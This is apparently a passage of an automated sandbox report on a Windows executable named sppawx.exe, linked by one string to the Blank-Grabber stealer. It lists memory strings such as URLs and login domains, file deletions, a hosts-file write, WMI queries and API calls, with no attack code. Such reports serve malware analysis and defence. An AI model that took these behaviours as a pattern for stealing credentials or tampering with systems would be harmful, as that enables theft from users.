              Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
              Source: sppawx.exe, 00000002.00000002.1747473298.0000018C7E7B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
              Source: sppawx.exe, 00000002.00000003.1303255633.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F090000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303336817.0000018C7F091000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1303236045.0000018C7F09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
              Source: sppawx.exe, 00000002.00000002.1745991860.0000018C01DDC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963
              Source: sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.
              Source: sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/2920p
              Source: sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/urllib3/urllib3/issues/3290
              Source: powershell.exe, 00000044.00000002.1539735870.000001AF3D638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F0B2000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F787000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F787000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/
              Source: sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail
              Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://google.com/mail/
              Source: sppawx.exe, 00000002.00000002.1748649261.0000018C7F490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gstatic.com/generate_204
              Source: sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/
              Source: sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://httpbin.org/
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://importlib-resources.readthedocs.io/en/latest/using.html#migrating-from-legacy
              Source: sppawx.exe, 00000002.00000003.1323503885.0000018C7F34E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://json.org
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C025B8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C025D8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com
              Source: powershell.exe, 0000000B.00000002.1419951585.000002724448A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C7D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1539735870.000001AF3E1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000044.00000002.1597118596.000001AF4C91B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: powershell.exe, 00000044.00000002.1539735870.000001AF3DD64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000044.00000002.1539735870.000001AF3DD64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1745892024.0000018C01C50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://packaging.python.org/specifications/entry-points/
              Source: sppawx.exe, 00000002.00000002.1748216532.0000018C7F190000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://peps.python.org/pep-0205/
              Source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://peps.python.org/pep-0263/
              Source: sppawx.exe, 00000002.00000002.1747906532.0000018C7EF90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png
              Source: sppawx.exe, 00000000.00000003.1299064923.00000213D851F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
              Source: sppawx.exe, 00000002.00000003.1485918071.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1494582448.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1485012431.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1493885361.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1463956124.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org
              Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/custoU
              Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F842000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
              Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoa
              Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F317000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc2388#section-4.4
              Source: sppawx.exe, 00000002.00000002.1748349929.0000018C7F296000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1324714906.0000018C7F2F3000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1325603169.0000018C7F291000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc7231#section-4.3.6)
              Source: sppawx.exe, 00000002.00000003.1517272348.0000018C7F6B9000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1740170260.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452098509.0000018C7F6B5000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748026153.0000018C7F0B2000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F787000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F787000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1748973373.0000018C7F6BA000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617821988.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/
              Source: sppawx.exe, 00000002.00000002.1746134120.0000018C01E80000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy
              Source: sppawx.exe, 00000002.00000002.1745991860.0000018C01D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://weibo.com/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.aliexpress.com/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.ca/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.co.uk/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.de/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.fr/
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.avito.ru/
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.baidu.com/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.bbc.co.uk/
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ctrip.com/
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.co.uk/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ebay.de/
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
              Source: sppawx.exe, 00000002.00000003.1615100281.0000018C7F904000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.ifeng.com/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.iqiyi.com/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.leboncoin.fr/
              Source: sppawx.exe, 00000002.00000003.1485918071.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1494582448.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1485012431.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1493885361.0000018C7F864000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1463956124.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/
              Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
              Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
              Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1452445176.0000018C7F841000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1444563764.0000018C7F840000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1490965971.0000018C7F6BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
              Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
              Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: sppawx.exe, 00000002.00000003.1452445176.0000018C7F89E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1494582448.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1454049976.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1485012431.0000018C7F82E000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1458853626.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469162238.0000018C7F833000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: sppawx.exe, 00000002.00000003.1464786245.0000018C7F896000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1492204812.0000018C7F896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02574000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
              Source: sppawx.exe, 00000000.00000003.1298173082.00000213D851F000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1754087915.00007FFEDD939000.00000004.00000001.01000000.0000000A.sdmp, sppawx.exe, 00000002.00000002.1751637595.00007FFEDCCB8000.00000004.00000001.01000000.00000011.sdmpString found in binary or memory: https://www.openssl.org/H
              Source: sppawx.exe, 00000002.00000002.1747645212.0000018C7ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
              Source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDE022000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
              Source: sppawx.exe, 00000002.00000002.1754174414.00007FFEDDF24000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/)
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02520000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
              Source: sppawx.exe, 00000002.00000003.1451486952.0000018C7F704000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C01430000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rfc-editor.org/rfc/rfc8259#section-8.1
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C01F90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
              Source: sppawx.exe, 00000002.00000002.1746242896.0000018C02074000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
              Source: sppawx.exe, 00000002.00000002.1746430268.0000018C02560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
              Source: sppawx.exe, 00000002.00000003.1740170260.0000018C7F726000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1617193305.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1484130042.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1744930553.0000018C014AB000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1469818072.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000002.1749404493.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1515784101.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1450803284.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1495682186.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1743024456.0000018C7F727000.00000004.00000020.00020000.00000000.sdmp, sppawx.exe, 00000002.00000003.1465225633.0000018C7F72A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://yahoo.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow created: window name: CLIPBRDWNDCLASS

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\user\Desktop\sppawx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\FACWLRWHGG.jpgJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AFWAAFRXKO.jpgJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AFWAAFRXKO.jpgJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AIXACVYBSB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile deleted: C:\Users\user\AppData\Local\Temp\ ? ? \Common Files\Desktop\AIXACVYBSB.mp3Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: cmd.exeProcess created: 73

              System Summary

              barindex
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Windows\System32\getmac.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetMultiStringValue
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256CD2C0: CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,103_2_00007FF6256CD2C0
              Source: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exeCode function: 103_2_00007FF6256FB57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,103_2_00007FF6256FB57C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A318BD00_2_00007FF79A318BD0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3369D40_2_00007FF79A3369D4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3110000_2_00007FF79A311000
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A31A34B0_2_00007FF79A31A34B
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A321BC00_2_00007FF79A321BC0
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A335C700_2_00007FF79A335C70
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A322C800_2_00007FF79A322C80
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A333C800_2_00007FF79A333C80
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3364880_2_00007FF79A336488
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3309380_2_00007FF79A330938
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A31A4E40_2_00007FF79A31A4E4
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A33411C0_2_00007FF79A33411C
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3309380_2_00007FF79A330938
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A3281540_2_00007FF79A328154
              Source: C:\Users\user\Desktop\sppawx.exeCode function: 0_2_00007FF79A323A140_2_00007FF79A323A14
